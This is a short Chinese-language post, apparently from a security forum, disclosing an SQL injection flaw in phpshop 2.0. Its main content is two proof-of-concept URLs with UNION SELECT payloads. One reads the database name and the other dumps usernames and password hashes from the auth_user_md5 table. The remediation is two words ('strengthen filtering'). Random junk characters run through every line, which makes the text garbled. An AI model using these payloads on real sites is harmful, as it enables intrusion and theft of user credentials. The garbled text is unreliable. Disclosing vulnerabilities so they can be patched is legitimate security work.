标题 : phpshop 2.0 SQL Injection Vulnerability
; P, Z6 }2 ^5 w6 O. ~
4 k/ c8 i m/ o& \$ u% ^作者 : By onestree, h9 p2 v: G' S- j7 X/ p0 ~8 v. ?
下载地址 : http://code.google.com/p/phpshop/downloads/list
+ }( o; l' ~) C8 G0 e测试地址: windows 7 / ubuntu
6 `1 Y% H1 r* x: ^+ L
/ N; S3 H6 k; z/ S3 s0 H) C* ` - _" ~! U q4 h; m2 }- { r) Y1 e
SQLi p0c:
4 [0 R# x4 F5 H ! V( p! u- B/ z6 ]9 v
==================
" f( X$ p# C2 L0 {. w- X3 n2 e3 \1 n# H " v& S. s0 ~* z$ y1 ^6 @* z3 e \- i
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
2 F! `' E3 J/ eunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
) h; d3 X3 L+ s" \! p
9 u' p7 P; ~/ G+ ehttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
: m5 ^% ^' N3 _9 M5 W$ r% H8 O; }8 I
修复:: D8 o7 x3 l' I1 P, U6 j
加强过滤9 q9 A$ E' O# O" X' ~
4 b' f- K" x3 |' t
. c: a* S$ x; ?' ?$ |" [8 N# M9 L
|